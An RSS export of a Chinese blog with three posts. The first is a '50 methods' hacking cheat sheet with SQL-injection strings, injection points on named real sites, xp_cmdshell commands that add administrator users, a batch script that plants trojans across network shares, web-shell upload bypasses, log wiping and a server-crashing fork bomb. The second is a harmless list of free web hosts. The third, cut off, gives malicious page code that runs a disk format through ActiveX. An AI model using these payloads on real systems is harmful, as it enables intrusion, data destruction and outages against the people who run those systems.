<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet href="/xsl/rss.xsl" type="text/xsl" media="screen"?>
<rss version="2.0" 
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:ppp="http://blog.sohu.com/rss/module/ppp/"
	>

	<channel>
		<title>内COOL</title>
		<link>http://caipei06.blog.sohu.com/</link>
		<description><![CDATA[网址]]></description>
		<pubDate>Mon, 28 Apr 2008 12:38:34 +0800</pubDate>
		<generator>搜狐博客</generator>
		<ppp:ebi>5d5e056792</ppp:ebi>
		<image>
			<title>http://blog.sohu.com</title>
			<url>http://js.pp.sohu.com/ppp/blog/images/common/logo_150_60.gif</url>
			<link>http://blog.sohu.com/</link>
			<width>100</width>
			<height>43</height>
			<description>搜狐博客</description>
		</image>
		<item>
			<title>黑客入侵网络的50种方法</title>
			<link>http://caipei06.blog.sohu.com/44071115.html</link>
			<comments>http://caipei06.blog.sohu.com/44071115.html#comment</comments>
			<dc:creator>内COOL</dc:creator>
			<pubDate>Mon, 28 Apr 2008 12:34:20 +0800</pubDate>
			<guid>http://caipei06.blog.sohu.com/44071115.html</guid>
			<description><![CDATA[
<table style="WORD-BREAK: break-all" cellspacing="0" cellpadding="0" align="center" border="0">
<tbody>
<tr valign="center" align="middle">
<td style="WORD-BREAK: break-all" bgcolor="#f5f5f5" colspan="2" height="20">黑客入侵网络的50种方法</td></tr>
<tr align="middle">
<td bgcolor="#d1e7fc" colspan="2"></td></tr>
<tr>
<td style="WORD-BREAK: break-all" valign="top" align="middle" colspan="2" height="10"></td></tr>
<tr>
<td style="WORD-BREAK: break-all" valign="top" colspan="2" height="300">
<p align="left"></p>
<p>现在网上的攻击事件越来越多，黑客都是通过什么方法来攻击我们的呢？下面我们给大家总结了黑客入侵网络的五十种方法，让大家做到有备无患。 <br />　　1.网宽网络有限公司制作的网站基本都有注入漏洞 搜索网宽网络</p>
<p>　　2.搜索栏里输入</p>
<p>　　关键字%'and 1=1 and '%'='</p>
<p>　　关键字%'and 1=2 and '%'='</p>
<p>　　比较不同处 可以作为注入的特征字符</p>
<p>　　3.登陆框用户名和密码输入'or'='or' 漏洞很老但是现在很是遍地都是</p>
<p>　　4.我们先到<a href="http://www.google.com/">www.google.com</a>底下搜索一下co net mib ver 1.0</p>
<p>　　密码帐号都是 'or'='or'</p>
<p>　　5.挂马代码</p>
<p>　　6.http://www.wyyfk.com/24小时挂qq工具</p>
<p>　　7.开启regedt32的sam的管理员权限 检查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理员和guest的f键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡,这方法是简单克隆,</p>
<p>　　net localgroup administrators还是可以看出guest是管理员来</p>
<p>　　7.只要敢想,新浪也可入侵 注入点</p>
<p>　　<a href="http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=59">http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=59</a></p>
<p>　　微软官方网站注入点</p>
<p>　　<a href="http://www.microsoft.com/library/toolbar/3.0/search.aspx?view=en-us&charset=iso-8859-1&qu">http://www.microsoft.com/library/toolbar/3.0/search.aspx?view=en-us&amp;charset=iso-8859-1&amp;qu</a>=</p>
<p>　　8.ms05016攻击工具用法 mshta.exe test.hta 文件名.后缀名 可以绑上qq大盗木马</p>
<p>　　9.有sa权限sqlserver数据库、并且能sql注入支持fso+asp的服务器</p>
<p>　　sql注入后，如何上传木马,</p>
<p>　　文章地址 <a href="http://hack123.home4u.china.com/0601.htm">http://hack123.home4u.china.com/0601.htm</a></p>
<p>　　10.qq强制聊天代码</p>
<p>　　<a href="http://wpa.qq.com/msgrd?v=1&uin">http://wpa.qq.com/msgrd?v=1&amp;uin</a>=对方的qq号&amp;site=ioshenmue&amp;menu=yes</p>
<p>　　使用方法：把代码中的红色的&ldquo;********&rdquo;星号换成你想与其聊天的qq号后复 制到浏览器的地址栏处即可。无论他是否你的好友，你无须加他为好友就能给 他发qq消息。</p>
<p>　　11. mybbs论坛cookie欺骗 后台备份马</p>
<p>　　12.软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂qq等</p>
<p>　　用法: 安装： instsrv.exe 服务名称 路径</p>
<p>　　卸载： instsrv.exe 服务名称 remove</p>
<p>　　13.以动网为例数据库查找dv_log,在上面的查询的字段名里选l_content后面的关键字填上password2,找到的username2=%b7%e7%a4%ce%b0%d7%d2%c2&amp;password2=01180017&amp;username1=%b7%e7%a4%ce%b0%d7%d2%c2&amp;submit=%cc%ed+%bc%d3 password2=01180017就是他的登陆密码</p>
<p>　　14.搜索的技巧 inurl:网址</p>
<p>　　15.启航工作室wms 5.0网站程序漏洞</p>
<p>　　在baidu 搜索powered by: sailingstudio website manage system 5.0 (sp1)</p>
<p>　　利用动画看<a href="http://soft.77169.com/62/20050530/6824.html">http://soft.77169.com/62/20050530/6824.html</a></p>
<p>　　16.很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测，也就是说，他会检测文件是不是有.jpg，那么我们要是把文件改成：ating.jpg.asp试试。。由于还是asp结尾，所以木马不会变~</p>
<p>　　17.天意商务系统网上依然有 有漏洞 网站具体的样式<a href="http://www.wzgcc.org/">http://www.wzgcc.org/</a></p>
<p>　　工具下载<a href="http://www.hack6.com/">www.hack6.com</a></p>
<p>　　地址栏里，填上天意商务系统的网址就可以了，注意一定要是主页面</p>
<p>　　18.sql注入时工具---internet选项---高级里找到显示友好的错误信息勾去掉</p>
<p>　　不能注入时要第一时间想到%5c暴库</p>
<p>　　19.这个dbinbd.asp文件插入后门的功能适用于文件名为.asp的所有access数据库不是动网论坛也一样可以使用的,后门隐蔽，几乎发现不了</p>
<p>　　工具使用方法动画和所有文件</p>
<p>　　<a href="http://www.anquanwu.com/bbs/printpage.asp?boardid=2&id=811">http://www.anquanwu.com/bbs/printpage.asp?boardid=2&amp;id=811</a></p>
<p>　　20.缺少xp_cmdshell时</p>
<p>　　尝试恢复exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'</p>
<p>　　假如恢复不成功,可以尝试直接加用户(针对开3389的)</p>
<p>　　declare @o int</p>
<p>　　exec sp_oacreate 'wscript.shell',@o out</p>
<p>　　exec sp_oamethod @o,'run',null,'cmd.exe /c net user ating ating /add' 再提到管理员<br />&nbsp;<br />&nbsp;<br />21.批量种植木马.bat <br />&nbsp;</p>
<p>　　for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中</p>
<p>　　for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间</p>
<p>　　扫描地址.txt里每个主机名一行 用\\开头</p>
<p>　　22.搜索 powered by discuz!4.0.0rc3 开放头像的可利用 工具地址<a href="http://www.hack6.com/">www.hack6.com</a></p>
<p>　　23.dv7.1用还原数据功能 还原asa木马</p>
<p>　　24.凡人网络购物系统v6.0 可以%5c暴库</p>
<p>　　25.ipb2.0.2漏洞 构造语句</p>
<p>　　$qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理员密码 想看动画到黑基里找 ipb&lt;= 2.0.3论坛注入工具 <a href="http://www.hack6.com/">www.hack6.com</a>有下载</p>
<p>　　26. 将工具传到邮箱 在下载上右击 复制快捷方式 拥有自己了的下载空间</p>
<p>　　27.北京冲qb要宽带号跟绑定宽带的后4位电话,当你扫出北京款待号的密码必须是8位的密码,而且开头是6或8的才可以,因为北京的电话都是6根8开头的而且都是8位的,北京的区名海淀 东城 西城 门头沟 丰台 潮阳 宣武 通州 昌平,去<a href="http://cnc.qq.com/bbn/">http://cnc.qq.com/bbn/</a>冲</p>
<p>　　28.搜索 企业网络办公系统 添'or''=' 登陆 在个人邮箱 上传asp木马</p>
<p>　　29.本人原创 搜索&quot;一点点星空驿站 留言本&quot; 默认数据库是gbmdb.mdb 很多网站用这个留言本 但是用搜索引擎搜不到 可以给大家在入寝时多个思路</p>
<p>　　30.在程序上传shell过程中，程序不允许包含标记符号的内容的文件上传,比如蓝屏最小 的asp木马,我们来把他的标签换一下： 保存为.asp,程序照样 执行.</p>
<p>　　31.目录权限设置变态的话可以用一些方法(比如serv-u溢出)将此web用户提权 可访问全站目录挂马</p>
<p>　　32.喜欢网页挂马的看看这篇总结文章吧</p>
<p>　　<a href="http://77169.com/news/hk/2005060611656.html">http://77169.com/news/hk/2005060611656.html</a></p>
<p>　　33.搜索&quot;images/admin&quot; 或&quot;.tw/images/admin&quot; 可以找到些台湾的数据库</p>
<p>　　34.iis6 for windows 2003 enterprise edition 如iis发布目录文件夹包含.asp后辍名.</p>
<p>　　将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.</p>
<p>　　.cer 等后缀的文件夹下都可以运行任何后缀的asp木马</p>
<p>　　35.telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的ip</p>
<p>　　然后用#clear logg和#clear line vty *删除日志</p>
<p>　　36.搜索关键字:&quot;copyright 2003-2004 动易网络&quot; 后面地址改成upfile_soft.asp 这样的漏洞很多</p>
<p>　　37.bbsxp的漏洞总结 powered by bbsxp 5.15/licence blog.asp中的对id 的过滤不严的漏洞 拿到管理员的前后台密码 工具：bbsxp完全版 cookies 欺骗 bbsxp 过滤了 asp 文件的上传 所以我们这里用 asa 来传马</p>
<p>　　38.学会总结入侵思路<a href="http://www.77169.com/news/hk/2005060811688.html">http://www.77169.com/news/hk/2005060811688.html</a></p>
<p>　　39.电脑坏了省去重新安装系统的方法</p>
<p>　　纯dos下执行，</p>
<p>　　xp:copy c:\windows\repair\*.* 到c:\windows\system32\config</p>
<p>　　2k: copy c:\winnt\repair\*.* 到c:\winnt\system32\config</p>
<p>　　40.一般人设置啊拉qq大盗的时候发信和收信都是同一个信箱，因此当我的机子中了此木马后没有立即杀掉进程，而是用内存编辑工具打开它的进程，查找smtp字样，就会找到它的信箱和密码了。只对1.5以前的管用.</p>
<p>　　41.内网控制内网 用vidc 还要有一只肉鸡 动画看黑基的</p>
<p>　　<a href="http://soft.77169.com/62/20050608/6878.html">http://soft.77169.com/62/20050608/6878.html</a></p>
<p>　　42.有许多管理员用备份的日期做备份数据库的名字</p>
<p>　　比如<a href="http://www.hack6.com/bbs/databackup/20050601.mdb">http://www.hack6.com/bbs/databackup/20050601.mdb</a></p>
<p>　　43.动网数据库oldusername=%b5%f0%b7%c0&amp;username2=%b5%f0%b7%c0&amp;password2=19841202&amp;adduser=%b5%f0%b7%c0&amp;id=12&amp;submit=%b8%fc+%d0%c2</p>
<p>　　不知道用户名(不是%b8%f0%b7%c0) 转化这个用他本身的页面</p>
<p>　　<a href="http://www.hack6.com/bbs/showerr.asp?boardid=0&errcodes=10,11&action=%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2">http://www.hack6.com/bbs/showerr.asp?boardid=0&amp;errcodes=10,11&amp;action=%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2</a></p>
<p>　　%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2这句话意思是&ldquo;填写登录信息&rdquo;</p>
<p>　　那么就把%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2换成%b5%f0%b7%c0 可以看到用户名</p>
<p>　　44.对付信息监控系统 木马必须是加密的 如net user用不了就用net1 user等等 我是大连的 大连这边主机用这方法好用 可以直接传加密的马 用用黑基tyrant的方法 上传一个cmd的aspshall 用nc连接自己的nc监听端口 在web目录下写个加ftp用户的txt 本地43958用nc提交 ftp到服务器加用户<br />&nbsp;<br />&nbsp;<br />45.解决tcp/ip筛选 在注册表里有三处，分别是： <br />&nbsp;</p>
<p>　　hkey_local_machine\system\controlset001\services\tcpip</p>
<p>　　hkey_local_machine\system\controlset002\services\tcpip</p>
<p>　　hkey_local_machine\system\currentcontrolset\services\tcpip</p>
<p>　　分别用</p>
<p>　　regedit -e d:\a.reg hkey_local_machine\system\currentcontrolset\services\tcpip</p>
<p>　　regedit -e d:\b.reg hkey_local_machine\system\controlset002\services\tcpip</p>
<p>　　regedit -e d:\c.reg hkey_local_machine\system\currentcontrolset\services\tcpip</p>
<p>　　命令来导出注册表项</p>
<p>　　然后把三个文件里的enablesecurityfilters&quot;=dword:00000001，</p>
<p>　　改成enablesecurityfilters&quot;=dword:00000000 再将以上三个文件分别用</p>
<p>　　regedit -s d:\a.reg regedit -s d:\b.reg regedit -s d:\c.reg 导入注册表即可</p>
<p>　　46.使chm木马无法在本地运行木马程序 将注册表&quot;hkey_current_u</p>
<p>　　ser\software\microsoft\windows\currentversion\internet settings\zones\0&quot;下的1004项的值由原来十进制的0改为十六进制的3。</p>
<p>　　47.开3389的5种方法</p>
<p>　　(1)打开记事本，编辑内容如下：</p>
<p>　　echo [components] &gt; c:\sql</p>
<p>　　echo tsenable = on &gt;&gt; c:\sql</p>
<p>　　sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q</p>
<p>　　编辑好后存为bat文件，上传至肉鸡，执行。</p>
<p>　　(2) (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05</p>
<p>　　下载地址:www.netsill.com/rots.zip</p>
<p>　　在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本，例如：</p>
<p>　　c:\&gt;cscript rots.vbs &lt;目标ip&gt; &lt;用户名&gt; &lt;密码&gt; [服务端口] [/r]</p>
<p>　　如果要对本地使用，ip地址为127.0.0.1或者一个点(用.表示)，用户名和密码都为空(用 &quot;&quot;表示)。</p>
<p>　　(3)djshao正式版5.0</p>
<p>　　解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyx*.**e上传到肉鸡的c:\winnt\temp下，然后 进入c:\winnt\temp目录执行djxyx*.**e解压缩文件，然后再执行解压缩出来的azzd.exe文件，等一会肉鸡 会自动重启!重启后会出现终端服务</p>
<p>　　(4)下载dameware nt utilities 3.66.0.0 注册版</p>
<p>　　地址<a href="http://www.netsill.com/dwmrcw36600.zip">www.netsill.com/dwmrcw36600.zip</a></p>
<p>　　安装注册完毕后输入对方ip用户名密码，等待出现是否安装的对话框点是。</p>
<p>　　复制启动后出现对方桌面。</p>
<p>　　在对方桌面进入控制面版，点添加或删除程序。进入后点添加/删除windows组件，找到终端服务，点际进入 后在启动终端服务上打上勾。确定自动提示重起，重起后ok</p>
<p>　　(5)大家最常用的 3389.exe 下载地址<a href="http://www.hack6.com/">www.hack6.com</a> 把程序上传到肉鸡运行后重启既可</p>
<p>　　48.qq上得到别人的ip</p>
<p>　　一般跟别人聊天 如果是对方先对你说话 那么她的ip显示出来的概率就大</p>
<p>　　当然如果是我们找对方 可以先跟她说发过去消息之后 然后关闭窗口等待她的回复</p>
<p>　　还可以用天网防火墙选择上udp数据保检测,即可拦截到对方ip</p>
<p>　　49.挂马js代码document.write('');保存到js页面里 可让所有页面挂马</p>
<p>　　50.让服务器重启</p>
<p>　　写个bat死循环:</p>
<p>　　@echo off</p>
<p>　　:loop1</p>
<p>　　cls</p>
<p>　　start</p>
<p>&nbsp;<br />cmd.exe</p>
<p>　　goto loop1</p>
<p>　　保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启</p></td></tr></tbody></table>]]></description>
		</item>
		    
		
		<item>
			<title>最新整理目前所有的免费空间</title>
			<link>http://caipei06.blog.sohu.com/43749884.html</link>
			<comments>http://caipei06.blog.sohu.com/43749884.html#comment</comments>
			<dc:creator>内COOL</dc:creator>
			<pubDate>Fri, 27 Apr 2007 15:41:07 +0800</pubDate>
			<category>网络学习</category>
			<guid>http://caipei06.blog.sohu.com/43749884.html</guid>
			<description><![CDATA[<p>
<table cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td align="middle">
<div align="center"><span><strong>最新整理目前所有的免费空间</strong></span></div></td></tr></tbody></table>
<table cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td valign="top" height="40">
<hr />

<table cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td align="middle">作者：佚名&nbsp;&nbsp;来源：www.hack58.net&nbsp;&nbsp;发布时间：2007-4-24 22:05:39&nbsp;&nbsp;发布人：noangel</td></tr></tbody></table></td></tr></tbody></table>
<table cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td>&nbsp;</td>
<td valign="top">
<table style="TABLE-LAYOUT: fixed; WORD-BREAK: break-all" cellspacing="0" cellpadding="0" border="0">


<tbody>
<tr>
<td>
<p align="right">&nbsp; </p>
<div style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px">
<div style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px"><font style="FONT-SIZE: 14px; FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif">&nbsp;&nbsp;第一万维网20M多权限主机,高速,稳定,可绑定域名,管理员很好说话<br />演示：http://xhwang.01www.net<br />申请：http://bbs.01www.com/<br /><br />国际异网10M php,cgi,mysql空间<br />演示：http://tanlong.888net.cn/<br />申请：http://www.888net.cn<br /><br />中国聚网20M+数据库2M国内免费PHP空间<br />演示：http://free1.e-168.cn/~diy/<br />申请：http://free.e-168.com/oter/tiaokuang.htm<br /><br />中华网10M免费空间[推荐]<br />演示：http://cn201net.home4u.china.com/<br />申请：http://home4u.china.com/GRegister.html <br /><br />我要安家免费10M PHP高深稳定空间[推荐]<br />演示：http://xhnet.512j.com<br />申请：http://www.512j.com/user/registe ... mp;agent_user=xhnet<br /><br />阳光丽都25M静态稳定空间[推荐]<br />演示：http://cn201.leedu.net<br />申请：http://free.leedu.net/servinfo.asp<br /><br /><br />悠深科技提供15M主机，服务器本身已支持asp,fso,jmail,aspjpeg,cgi,php,动易组件,可以自主设置域名解析[推荐]<br />演示：http://www.cn201.net<br />申请：http://free.63dns.com/<br /><br />常访问提供20M静态空间[推荐]<br />演示：http://diy.fangwen.cn/<br />申请：http://fangwen.com/reg.asp<br /><br />永硕硬盘重新开放<br />演示：http://diy.*****/<br />申请： http://www.*****/<br /><br />众游网提供20M音乐空间(可升级)[推荐]<br />歌喉好的有福了，这是一个很好的自我推荐平台，上传深度及快，播放流畅,也能做个FLASH小站<br />MP3演示: http://www.pg168.com/kalaok/addc ... 108482&amp;to=myweb<br />FLASH演示: http://www.pg168.com/kalaok/t_zs14_myflash.aspx?uid=1108482<br />申请: http://www.pg168.com<br /><br />虎翼50MB主机[推荐]<br />演示：http://cn201.51.net/<br />申请：http://club.51.net/signfree.php<br /><br />中国圣博自助建站系统5M空间，模板漂亮,系统稳定[推荐网建新手使用]<br />演示:http://cn201.home.bj001.net/<br />申请:http://bj.sunbo.net<br /><br />无忧建站网自助建站[推荐] <br />演示: http://xhwang.any2000.com<br />申请：http://www.any2000.com/perweb/in ... ;developfrom=xhwang<br /><br />--------------------------------------<br />国内免费空间<br />--------------------------------------<br />衢洲网10M静态空间 <br />演示：http://home.qz168.com/home/diy/<br />申请: http://home.qz168.com/reg.asp<br /><br />十堰个人主页基地10M ASP空间 <br />申请:http://sy9t.kmip.net/web/reg.asp<br /><br />GAOTUO网免费PHP+MYSQL空间<br />论坛申请：http://www.gaotuo.com/viewthread.php?tid=338<br /><br />一起嗨50M ASP空间 <br />演示:http://xhwang.67867.com/<br />申请:http://67867.com/reg.asp<br /><br />无限E空间100M html主页空间 <br />申请：http://awxk.net/web/<br /><br />飘林网免费空间 <br />申请：http://good8888.com/zhuye<br /><br />虚实网络20M asp空间 <br />申请:http://www.skyxh.com/<br /><br />莞邮科技20M asp空间<br />演示：http://web.dgmail.cn/xhwang/<br />申请: http://web.dgmail.cn<br /><br />香港10M PHP CGI ASP空间 <br />申请: http://wcsw.homelinux.com/webhosting/web_host.php3 <br /><br />亿网10兆免费私密空间（网络硬盘），这个空间有价值就在于超级稳定,我的已用2年多了.<br />申请:http://www.eoa.net.cn/<br /><br />爱网50M音乐空间 <br />演示:<br />　　　我的主页:http://diy.29w.net/<br />　　　原创首页:http://www.29w.net/vip/ShowUserPage.asp?userid=diy<br />申请:http://www.29w.net/vip/UserReg.asp<br /><br />语聊网100M免费空间，支持ASP，FSO<br />申请:http://www.88yuliao.com/kj/<br /><br />雅安热线100M空间<br />申请：http://myweb.8428.com/room.htm<br /><br />pchome.com 10M空间 <br />申请：http://isp.pchome.com.tw/register/<br /><br />雨中漫步10M纯静态空间<br />申请：http://yzmb.xicp.net/n5/reg.asp<br /><br />流沙歌秀100M歌曲上传空间 <br />申请: http://www.liusha.net/regist.asp<br /><br />龍の族部落30M空间 <br />演示：http://web.lzbl.net/htm/xhwang/<br />申请: http://web.lzbl.net/reg_u.asp过滤了=main<br /><br />異次元聯盟30M网页空间/ASP/ASP.NET/PHP +100M相册+300M邮箱（需台湾身份证）<br />申请：http://mail77.com.tw/index_0.asp<br /><br />Xoops China 50M 空间（国内）<br />演示: http://xhnet.info/<br />申请：http://www.xoops.org.cn/modules/newbb/viewforum.php?forum=9<br /><br />中国特价网10M ASP FTP空间<br />申请：http://www.tj99.com/vip/kongjian/zhuc.asp<br /><br /><br />易速20M ASP空间<br />演示：http://free.china886.com/home/xhwang<br />申请：http://free.china886.com/<br /><br />广丰热线10M无广告ASP空间<br />申请：http://www.334600.com/homepage/reg0.asp<br /><br />站长学堂30M静态空间<br />演示：http://diy.joo.cn<br />申请：http://www.joo.cn/zysq/zysq.asp<br /><br />中国网友联盟10M静态免费空间<br />演示：http://www.110web.com/xhwang/<br />申请：http://www.110web.com/index.asp<br /><br /><br />哇啦啦提供50M空间，空间同时支持asp、asp.net、php动态程序，Access、MySql数据库<br />演示：http://xhwang.vhost1.valala.com<br />申请: http://valala.net/ <br /><br />三山科技免费空间<br />演示：http://free.33china.com/home/xhwang<br />申请：http://free.33china.com/reg.asp<br /><br />同乐云滇30M asp空间<br />申请：http://joy.6600.org/ftpask <br /><br />蒲松龄数据15M ASP空间<br />演示：http://www.pusongling.name/xhwang<br />申请: http://pusongling.name/add.asp<br /><br />100M下载空间 <br />申请：http://polopo.com/<br /><br />瓢城网20Masp空间 <br />申请：http://home.piaocheng.com/system/ <br /><br />白山信息网免费空间 <br />申请:http://www.xxbs.com/web/reg_u.asp过滤了=main <br /><br />Q搜免费20M空间<br />演示：http://my.qq115.com/my/xhwang/<br />申请：http://my.qq115.com/<br /><br />久久家园10M ASP FSO空间<br />申请:http://99.home9.net/<br /><br />一个20-50MB 普通空间 <br />申请: http://input.foruto.com/free/apply.htm <br /><br />--------------------------------------------<br />网络硬盘<br />--------------------------------------------<br /><br />1g.蜂盘<br />网址：http://www.1g.cn<br /><br />51bak全球最大免费备份平台，免费存储15天<br />网址：http://www.51bak.com/index.htm<br /><br />极星在线20mb网络硬盘 <br />申请：http://web.5ics.net<br /><br />中国活动通信50M+100M免费网络硬盘<br />申请:http://www.mofile.com/<br /><br />国内superdog网络硬盘 <br />申请：http://www.zhaoyan.com/producta/superdog/index.asp<br /><br />vru.cn 10M网络硬盘<br />申请：http://www.vru.cn/<br /><br />vdisk.cn免费100M网络硬盘 <br />申请：http://www.vdisk.cn/ <br />--------------------------------------------<br />国外免费空间<br />------------------------------------------<br />20mb/php/mysql/ftp/cp/servermerdeka.com<br />申请: http://servermerdeka.com/core/hosting.daftar.php<br /><br />韩国20m/ftp/naver.com <br />申请攻略：http://xhwang.com/article.php?articleid=277<br />申请：https://ids.naver.com/newid/register/inputNameSocno.php<br /><br />5M PHP CGI PERL SH FTP/fw.nu <br />申请:http://www.fw.nu/signup <br /><br />50M PHP CP/swifthost.net <br />申请:http://swifthost.net/index.php?page=order <br /><br />20M无广告空间/bravenet.com <br />申请:http://www.bravenet.com/ <br /><br />无限空间/activewebhosting.com <br />申请：http://www.activewebhosting.com/free/signup.asp<br /><br />500M图片空间/freephotohost.net<br />申请: http://www.freephotohost.net/<br /><br />5M可绑米worldsoftintl.com <br />申请：http://www.worldsoftintl.com/free-web-hosting.htm <br /><br />无限图片空间/imgpost.com<br />网址：http://www.imgpost.com/<br /><br />100M图片空间/myimgsrc.com <br />地址：http://www.myimgsrc.com/<br /><br />100M PHP空间/rogean.net<br />http://www.rogean.net/clientexec ... pe=5&amp;package=13<br /><br />www.ifrance.com无限主页空间<br />申请攻略:http://xhwang.com/article.php/157<br />申请： http://www.ifrance.com/_site/cre.start<br /><br />openbluhost.com可自定空间大小/php/mysql/cp/<br />申请：http://www.openbluhost.com/qualify.php<br /><br />mcfreehost.com 1000M 多权限空间<br />申请：http://www.mcfreehost.com/<br /><br />fat-host.com 100M PHP 空间<br />申请：http://fat-host.com/signup.html <br /><br />100M PHP 可绑域名/psisco.com<br />申请：http://psisco.com/webhosting/free.php?lang=en<br /><br />15M CGI PHP/15mb.net <br />申请：http://www.15mb.net/signup.php <br /><br />15M ASP ASP.NET/somee.com<br />申请：http://www.somee.com/FreePackage.aspx<br /><br />250M/PHP/MYSQL/FTP(xoopiter.com) <br />申请：http://www.xoopiter.com/cgi-bin/register.cgi<br /><br />Uzhost 10M全能空间 <br />申请：http://www.uzhost.com/hosting_free.asp <br /><br />一个国外的网络硬盘 <br />唯一不足的是1个月1G流量<br />申请以后好有1个FTP帐号，文件也可以设置IP限制 <br />申请：http://www.downloadhosting.com/<br /><br />免费mysql数据库(远程调用)<br />申请:http://www.freesql.org<br /><br />免费 MYSQL <br />申请:http://www.hotsql.com/?page=signup <br /><br />000k.com提供125M空间/ASP/CGI/PHP/SSI/MYSQL/FTP/CP/POSTGRESQL/DOMAIN <br />对于申请的邮箱有限制<br />500M月流量限制/可使用顶级域名或者他们二级域名 <br />申请: http://www.000k.com/hostsetup1.php<br /><br />fbhosting.com 50M全能空间<br />http://www.fbhosting.com/signup.html<br /><br />fwhost.net/999M/PHP空间<br />演示：http://kaowin.fwhost.net<br />PHP探什：http://kaowin.fwhost.net/info.php<br />攻略：http://cn201.net/article.php/81<br />地址：http://www.fwhost.net/add.php<br /><br />可绑米免费空间 <br />http://www.realfreehost.com <br /><br />200MBjapanPHP空间<br />申请： http://www.aaacafe.ne.jp/fh/<br /><br />icanxhosting.com 500m/5g/php,无尽mysql,cgi/域名<br />申请：http://www.icanxhosting.com/signup/freeindex.php<br /><br />metropoli2000.com 999MB/无限流量/PHP/MYSQL/CGI/西班牙<br />申请：http://www.metropoli2000.com/<br />http://www.metropoliglobal.com/index.html?hstep=1<br /><br />evangel-list 20m/500m/php/mysql/cgi/ftp/cp/绑玉米 <br />申请：http://www.evangel-list.com/hosting.htm <br /><br />无限/PHP/MYSQL/CGI/CP/FTP-w3d<br />申请：http://w3dwebhost.net/<br /><br />1G/php/cgi/mysql/cp/edealseek.comlank&gt;<br />申请：http://www.edealseek.com/hosting/freehosting.htm<br /></font></div>
<div></div></div>
<div></div></td></tr>
<tr>
<td style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px" align="right" height="25">
<table cellspacing="0" cellpadding="0" align="center" border="0">
<tbody>
<tr>
<td>&nbsp;</td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></p>]]></description>
		</item>
		    
		
		<item>
			<title>网页恶意代码大总结(共15项)</title>
			<link>http://caipei06.blog.sohu.com/43433288.html</link>
			<comments>http://caipei06.blog.sohu.com/43433288.html#comment</comments>
			<dc:creator>内COOL</dc:creator>
			<pubDate>Wed, 25 Apr 2007 05:04:50 +0800</pubDate>
			<category>网络学习</category>
			<guid>http://caipei06.blog.sohu.com/43433288.html</guid>
			<description><![CDATA[<p><strong><font color="#dc143c">以下代码仅供学习研究使用，请勿使用害人，造成损失本人概不负责，谢谢合作！</font></strong> </p>
<p>　　<strong>1、格式化硬盘</strong> <br /><br /></p>
<div>&lt;object id=&quot;scr&quot; classid=&quot;clsid:06290BD5-48AA-11D2-8432-006008C3FBFC&quot;&gt; <br />&lt;/object&gt; <br />&lt;script&gt; <br />scr.Reset(); <br />scr.Path=&quot;C:\\windows\\Men?inicio\\Programas\\Inicio\\automat.hta&quot;; <br />scr.Doc=&quot;&lt;object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B&gt;&lt;/object&gt;&lt;script&gt;wsh.Run(start /m format a: /q /autotest /u);alert(IMPORTANT : Windows is configuring the system. Plase do not interrupt this process.);&lt;/&quot;+&quot;SCRIPT&gt;&quot;; <br />scr.write(); </div>
<p><br /><br />　<strong>　2、使 WINDOWS 98掉线的代码</strong> <br /><br /></p>
<div>&lt;html&gt; <br />&lt;head&gt; <br />&lt;/head&gt; <br />&lt;a href=&quot;wincrash.htm&quot; on mouseclick=&quot;alert(&quot;Go To Hell,Mall!&quot;)&quot;&gt;HaHa!&lt;/a&gt; <br />&lt;/html&gt; <br />　　wincrash.htm<br />&lt;HTML&gt; <br />&lt;BODY&gt; <br />&lt;IMG SRC=&quot;c:\con\con&quot;&gt; <br />&lt;!-- or nul\nul, clock$\clock$ --&gt; <br />&lt;!-- or aux\aux, config$\config$ --&gt; <br />&lt;/BODY&gt; <br />&lt;/HTML&gt; </div>
<p><br /><br /><strong>　　3、 IE视窗炸弹或者叫让IE不段循环的代码<br /></strong><br /></p>
